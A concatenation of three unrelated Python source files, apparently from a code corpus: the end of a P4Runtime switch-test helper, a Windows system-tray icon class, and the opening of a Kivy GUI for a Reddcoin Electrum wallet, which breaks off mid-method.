p4runtime_pb2.Update.INSERT)
def send_request_add_member(self, ap_name, mbr_id, a_name, params):
req = self.get_new_write_request()
self.push_update_add_member(req, ap_name, mbr_id, a_name, params)
return req, self.write_request(req)
def push_update_modify_member(self, req, ap_name, mbr_id, a_name, params):
self._push_update_member(req, ap_name, mbr_id, a_name, params,
p4runtime_pb2.Update.MODIFY)
def send_request_modify_member(self, ap_name, mbr_id, a_name, params):
req = self.get_new_write_request()
self.push_update_modify_member(req, ap_name, mbr_id, a_name, params)
return req, self.write_request(req, store=False)
def push_update_add_group(self, req, ap_name, grp_id, grp_size=32,
mbr_ids=()):
update = req.updates.add()
update.type = p4runtime_pb2.Update.INSERT
ap_group = update.entity.action_profile_group
ap_group.action_profile_id = self.get_ap_id(ap_name)
ap_group.group_id = grp_id
ap_group.max_size = grp_size
for mbr_id in mbr_ids:
member = ap_group.members.add()
member.member_id = mbr_id
def send_request_add_group(self, ap_name, grp_id, grp_size=32, mbr_ids=()):
req = self.get_new_write_request()
self.push_update_add_group(req, ap_name, grp_id, grp_size, mbr_ids)
return req, self.write_request(req)
def push_update_set_group_membership(self, req, ap_name, grp_id,
mbr_ids=()):
update = req.updates.add()
update.type = p4runtime_pb2.Update.MODIFY
ap_group = update.entity.action_profile_group
ap_group.action_profile_id = self.get_ap_id(ap_name)
ap_group.group_id = grp_id
for mbr_id in mbr_ids:
member = ap_group.members.add()
member.member_id = mbr_id
def send_request_set_group_membership(self, ap_name, grp_id, mbr_ids=()):
req = self.get_new_write_request()
self.push_update_set_group_membership(req, ap_name, grp_id, mbr_ids)
return req, self.write_request(req, store=False)
#
# for all add_entry function, use mk == None for default entry
#
# TODO(antonin): The current P4Runtime reference implementation on p4lang
# does not support resetting the default entry (i.e. a DELETE operation on
# the default entry), which is why we make sure not to include it in the
# list used for autocleanup, by passing store=False to write_request calls.
#
def push_update_add_entry_to_action(self, req, t_name, mk, a_name, params, priority=0):
update = req.updates.add()
update.type = p4runtime_pb2.Update.INSERT
table_entry = update.entity.table_entry
table_entry.table_id = self.get_table_id(t_name)
table_entry.priority = priority
if mk is None or len(mk) == 0:
table_entry.is_default_action = True
else:
self.set_match_key(table_entry, t_name, mk)
self.set_action_entry(table_entry, a_name, params)
def send_request_add_entry_to_action(self, t_name, mk, a_name, params, priority=0):
req = self.get_new_write_request()
self.push_update_add_entry_to_action(req, t_name, mk, a_name, params, priority)
return req, self.write_request(req, store=(mk is not None))
def push_update_add_entry_to_member(self, req, t_name, mk, mbr_id):
update = req.updates.add()
update.type = p4runtime_pb2.Update.INSERT
table_entry = update.entity.table_entry
table_entry.table_id = self.get_table_id(t_name)
if mk is not None:
self.set_match_key(table_entry, t_name, mk)
else:
table_entry.is_default_action = True
table_entry.action.action_profile_member_id = mbr_id
def send_request_add_entry_to_member(self, t_name, mk, mbr_id):
req = self.get_new_write_request()
self.push_update_add_entry_to_member(req, t_name, mk, mbr_id)
return req, self.write_request(req, store=(mk is not None))
def push_update_add_entry_to_group(self, req, t_name, mk, grp_id):
update = req.updates.add()
update.type = p4runtime_pb2.Update.INSERT
table_entry = update.entity.table_entry
table_entry.table_id = self.get_table_id(t_name)
if mk is not None:
self.set_match_key(table_entry, t_name, mk)
else:
table_entry.is_default_action = True
table_entry.action.action_profile_group_id = grp_id
def send_request_add_entry_to_group(self, t_name, mk, grp_id):
req = self.get_new_write_request()
self.push_update_add_entry_to_group(req, t_name, mk, grp_id)
return req, self.write_request(req, store=(mk is not None))
# iterates over all requests in reverse order; if they are INSERT updates,
# replay them as DELETE updates; this is a convenient way to clean-up a lot
# of switch state
def undo_write_requests(self, reqs):
updates = []
for req in reversed(reqs):
for update in reversed(req.updates):
if update.type == p4runtime_pb2.Update.INSERT:
updates.append(update)
new_req = self.get_new_write_request()
for update in updates:
update.type = p4runtime_pb2.Update.DELETE
new_req.updates.add().CopyFrom(update)
self._write(new_req)
# Add p4info object and object id "getters" for each object type; these are just
# wrappers around P4RuntimeTest.get_obj and P4RuntimeTest.get_obj_id.
# For example: get_table(x) and get_table_id(x) respectively call
# get_obj("tables", x) and get_obj_id("tables", x)
for obj_type, nickname in [("tables", "table"),
("action_profiles", "ap"),
("actions", "action"),
("counters", "counter"),
("direct_counters", "direct_counter")]:
name = "_".join(["get", nickname])
setattr(P4RuntimeTest, name, partialmethod(
P4RuntimeTest.get_obj, obj_type))
name = "_".join(["get", nickname, "id"])
setattr(P4RuntimeTest, name, partialmethod(
P4RuntimeTest.get_obj_id, obj_type))
# this decorator can be used on the runTest method of P4Runtime PTF tests
# when it is used, the undo_write_requests will be called at the end of the test
# (irrespective of whether the test was a failure, a success, or an exception
# was raised). When this is used, all write requests must be performed through
# one of the send_request_* convenience functions, or by calling write_request;
# do not use stub.Write directly!
# most of the time, it is a great idea to use this decorator, as it makes the
# tests less verbose. In some circumstances, it is difficult to use it, in
# particular when the test itself issues DELETE request to remove some
# objects. In this case you will want to do the cleanup yourself (in the
# tearDown function for example); you can still use undo_write_request which
# should make things easier.
# because the PTF test writer needs to choose whether or not to use autocleanup,
# it seems more appropriate to define a decorator for this rather than do it
# unconditionally in the P4RuntimeTest tearDown method.
def autocleanup(f):
@wraps(f)
def handle(*args, **kwargs):
test = args[0]
assert (isinstance(test, P4RuntimeTest))
try:
return f(*args, **kwargs)
finally:
test.undo_write_requests(test.reqs)
return handle
def skip_on_hw(cls):
cls._skip_on_hw = True
return cls
|
traybar.py | import os
from .win32_adapter import *
import threading
import uuid
class SysTrayIcon(object):
"""
menu_options: tuple of tuples (menu text, menu icon path or None, function name)
menu text and tray hover text should be Unicode
hover_text length is limited to 128; longer text will be truncated
Can be used as context manager to enable automatic termination of tray
if parent thread is closed:
with SysTrayIcon(icon, hover_text) as systray:
for item in ['item1', 'item2', 'item3']:
systray.update(hover_text=item)
do_something(item)
"""
QUIT = 'QUIT'
SPECIAL_ACTIONS = [QUIT]
FIRST_ID = 1023
def __init__(self,
icon,
hover_text,
menu_options=None,
on_quit=None,
default_menu_index=None,
window_class_name=None):
self._icon = icon
self._icon_shared = False
self._hover_text = hover_text
self._on_quit = on_quit
menu_options = menu_options or ()
menu_options = menu_options + (('Quit', None, SysTrayIcon.QUIT),)
self._next_action_id = SysTrayIcon.FIRST_ID
self._menu_actions_by_id = set()
self._menu_options = self._add_ids_to_menu_options(list(menu_options))
self._menu_actions_by_id = dict(self._menu_actions_by_id)
window_class_name = window_class_name or ("SysTrayIconPy-%s" % (str(uuid.uuid4())))
self._default_menu_index = (default_menu_index or 0)
self._window_class_name = encode_for_locale(window_class_name)
self._message_dict = {RegisterWindowMessage("TaskbarCreated"): self._restart,
WM_DESTROY: self._destroy,
WM_CLOSE: self._destroy,
WM_COMMAND: self._command,
WM_USER+20: self._notify}
self._notify_id = None
self._message_loop_thread = None
self._hwnd = None
self._hicon = 0
self._hinst = None
self._window_class = None
self._menu = None
self._register_class()
def __enter__(self):
"""Context manager so SysTray can automatically close"""
self.start()
return self
def __exit__(self, *args):
"""Context manager so SysTray can automatically close"""
self.shutdown()
def WndProc(self, hwnd, msg, wparam, lparam):
hwnd = HANDLE(hwnd)
wparam = WPARAM(wparam)
lparam = LPARAM(lparam)
if msg in self._message_dict:
self._message_dict[msg](hwnd, msg, wparam.value, lparam.value)
return DefWindowProc(hwnd, msg, wparam, lparam)
def _register_class(self):
# Register the Window class.
self._window_class = WNDCLASS()
self._hinst = self._window_class.hInstance = GetModuleHandle(None)
self._window_class.lpszClassName = self._window_class_name
self._window_class.style = CS_VREDRAW | CS_HREDRAW
self._window_class.hCursor = LoadCursor(0, IDC_ARROW)
self._window_class.hbrBackground = COLOR_WINDOW
self._window_class.lpfnWndProc = LPFN_WNDPROC(self.WndProc)
RegisterClass(ctypes.byref(self._window_class))
def _create_window(self):
style = WS_OVERLAPPED | WS_SYSMENU
self._hwnd = CreateWindowEx(0, self._window_class_name,
self._window_class_name,
style,
0,
0,
CW_USEDEFAULT,
CW_USEDEFAULT,
0,
0,
self._hinst,
None)
UpdateWindow(self._hwnd)
self._refresh_icon()
def _message_loop_func(self):
self._create_window()
PumpMessages()
def start(self):
if self._hwnd:
return # already started
self._message_loop_thread = threading.Thread(target=self._message_loop_func)
self._message_loop_thread.start()
def shutdown(self):
if not self._hwnd:
return # not started
PostMessage(self._hwnd, WM_CLOSE, 0, 0)
self._message_loop_thread.join()
def update(self, icon=None, hover_text=None, menu_options=None): # "menu_options=None" added to be allow the update of the menu options
""" update icon image and/or hover text and/or menu options"""
if icon:
self._icon = icon
self._load_icon()
if hover_text:
self._hover_text = hover_text
# "if menu_options" added to be allow the update of the menu options
if menu_options:
menu_options = menu_options or ()
menu_options = menu_options + (('Quit', None, SysTrayIcon.QUIT),)
self._next_action_id = SysTrayIcon.FIRST_ID
self._menu_actions_by_id = set()
self._menu_options = self._add_ids_to_menu_options(list(menu_options))
self._menu_actions_by_id = dict(self._menu_actions_by_id)
self._menu = None # detroy the old menu created by right clicking the icon
self._refresh_icon()
def _add_ids_to_menu_options(self, menu_options):
result = []
for menu_option in menu_options:
option_text, option_icon, option_action = menu_option
if callable(option_action) or option_action in SysTrayIcon.SPECIAL_ACTIONS:
self._menu_actions_by_id.add((self._next_action_id, option_action))
result.append(menu_option + (self._next_action_id,))
elif non_string_iterable(option_action):
result.append((option_text,
option_icon,
self._add_ids_to_menu_options(option_action),
self._next_action_id))
else:
raise Exception('Unknown item', option_text, option_icon, option_action)
self._next_action_id += 1
return result
def _load_icon(self):
# release previous icon, if a custom one was loaded
# note: it's important *not* to release the icon if we loaded the default system icon (with
# the LoadIcon function) - this is why we assign self._hicon only if it was loaded using LoadImage
if not self._icon_shared and self._hicon != 0:
DestroyIcon(self._hicon)
self._hicon = 0
# Try and find a custom icon
hicon = 0
if self._icon is not None and os.path.isfile(self._icon):
icon_flags = LR_LOADFROMFILE | LR_DEFAULTSIZE
icon = encode_for_locale(self._icon)
hicon = self._hicon = LoadImage(0, icon, IMAGE_ICON, 0, 0, icon_flags)
self._icon_shared = False
# Can't find icon file - using default shared icon
if hicon == 0:
self._hicon = LoadIcon(0, IDI_APPLICATION)
self._icon_shared = True
self._icon = None
def _refresh_icon(self):
if self._hwnd is None:
return
if self._hicon == 0:
self._load_icon()
if self._notify_id:
message = NIM_MODIFY
else:
message = NIM_ADD
self._notify_id = NotifyData(self._hwnd,
0,
NIF_ICON | NIF_MESSAGE | NIF_TIP,
WM_USER+20,
self._hicon,
self._hover_text)
Shell_NotifyIcon(message, ctypes.byref(self._notify_id))
def _restart(self, hwnd, msg, wparam, lparam):
self._refresh_icon()
def _destroy(self, hwnd, msg, wparam, lparam):
if self._on_quit:
self._on_quit(self)
nid = NotifyData(self._hwnd, 0)
Shell_NotifyIcon(NIM_DELETE, ctypes.byref(nid))
PostQuitMessage(0) # Terminate the app.
# TODO * release self._menu with DestroyMenu and reset the memeber
# * release self._hicon with DestoryIcon and reset the member
# * release loaded menu icons (loaded in _load_menu_icon) with DeleteObject
# (we don't keep those objects anywhere now)
self._hwnd = None
self._notify_id = None
def _notify(self, hwnd, msg, wparam, lparam):
if lparam == WM_LBUTTONDBLCLK:
self._execute_menu_option(self._default_menu_index + SysTrayIcon.FIRST_ID)
elif lparam == WM_RBUTTONUP:
self._show_menu()
elif lparam == WM_LBUTTONUP:
pass
return True
def _show_menu(self):
if self._menu is None:
self._menu = CreatePopupMenu()
self._create_menu(self._menu, self._menu_options)
#SetMenuDefaultItem(self._menu, 1000, 0)
pos = POINT()
GetCursorPos(ctypes.byref(pos))
# See http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/menus_0hdi.asp
SetForegroundWindow(self._hwnd)
TrackPopupMenu(self._menu,
TPM_LEFTALIGN,
pos.x,
pos.y,
0,
self._hwnd,
None)
PostMessage(self._hwnd, WM_NULL, 0, 0)
def _create_menu(self, menu, menu_options):
for option_text, option_icon, option_action, option_id in menu_options[::-1]:
if option_icon:
option_icon = self._prep_menu_icon(option_icon)
if option_id in self._menu_actions_by_id:
item = PackMENUITEMINFO(text=option_text,
hbmpItem=option_icon,
wID=option_id)
InsertMenuItem(menu, 0, 1, ctypes.byref(item))
else:
submenu = CreatePopupMenu()
self._create_menu(submenu, option_action)
item = PackMENUITEMINFO(text=option_text,
hbmpItem=option_icon,
hSubMenu=submenu)
InsertMenuItem(menu, 0, 1, ctypes.byref(item))
def _prep_menu_icon(self, icon):
icon = encode_for_locale(icon)
# First load the icon.
ico_x = GetSystemMetrics(SM_CXSMICON)
ico_y = GetSystemMetrics(SM_CYSMICON)
hicon = LoadImage(0, icon, IMAGE_ICON, ico_x, ico_y, LR_LOADFROMFILE)
hdcBitmap = CreateCompatibleDC(None)
hdcScreen = GetDC(None)
hbm = CreateCompatibleBitmap(hdcScreen, ico_x, ico_y)
hbmOld = SelectObject(hdcBitmap, hbm)
# Fill the background.
brush = GetSysColorBrush(COLOR_MENU)
FillRect(hdcBitmap, ctypes.byref(RECT(0, 0, 16, 16)), brush)
# draw the icon
DrawIconEx(hdcBitmap, 0, 0, hicon, ico_x, ico_y, 0, 0, DI_NORMAL)
SelectObject(hdcBitmap, hbmOld)
# No need to free the brush
DeleteDC(hdcBitmap)
DestroyIcon(hicon)
return hbm
def _command(self, hwnd, msg, wparam, lparam):
id = LOWORD(wparam)
self._execute_menu_option(id)
def _execute_menu_option(self, id):
menu_action = self._menu_actions_by_id[id]
if menu_action == SysTrayIcon.QUIT:
DestroyWindow(self._hwnd)
else:
menu_action(self)
def non_string_iterable(obj):
try:
iter(obj)
except TypeError:
return False
else:
return not isinstance(obj, str)
|
main_window.py | import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import reddelectrum as electrum
from reddelectrum.bitcoin import TYPE_ADDRESS
from reddelectrum import WalletStorage, Wallet
from reddelectrum_gui.kivy.i18n import _
from reddelectrum.paymentrequest import InvoiceStore
from reddelectrum.util import profiler, InvalidPassword
from reddelectrum.plugins import run_hook
from reddelectrum.util import format_satoshis, format_satoshis_plain
from reddelectrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
# lazy imports for factory so that widgets can be used in kv
Factory.register('InstallWizard',
module='reddelectrum_gui.kivy.uix.dialogs.installwizard')
Factory.register('InfoBubble', module='reddelectrum_gui.kivy.uix.dialogs')
Factory.register('OutputList', module='reddelectrum_gui.kivy.uix.dialogs')
Factory.register('OutputItem', module='reddelectrum_gui.kivy.uix.dialogs')
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('reddelectrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='reddelectrum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from reddelectrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from reddelectrum.network import DEFAULT_PORTS
pp = servers.get(host, DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'reddcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'RDD')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
super(ElectrumWindow, self).__init__(**kwargs)
title = _('reddelectrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', False)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from reddelectrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('reddcoin:'):
self.set_URI(data)
return
# try to decode transaction
from reddelectrum.transaction import Transaction
try:
text = base_decode(data, None, base=43).encode('hex')
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'requests']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from reddelectrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.open()
def qr_dialog(self, title, data, show_text=False):
from uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
Intent = autoclass('android.content.Intent')
intent = Intent("com.google.zxing.client.android.SCAN")
intent.putExtra("SCAN_MODE", "QR_CODE_MODE")
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
try:
PythonActivity.mActivity.startActivityForResult(intent, 0)
except:
self.show_error(_('Could not start Barcode Scanner.') + ' ' + _('Please install the Barcode Scanner app from ZXing'))
def scan_qr_zxing(self, on_complete):
# uses zxing embedded lib
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
IntentIntegrator = autoclass('com.google.zxing.integration.android.IntentIntegrator')
integrator = IntentIntegrator(PythonActivity.mActivity)
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
integrator.initiateScan()
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
if self._settings_dialog is None:
from uix.dialogs.settings import SettingsDialog
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='reddelectrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='reddelectrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('reddelectrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('reddelectrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.icon = "icons/reddelectrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
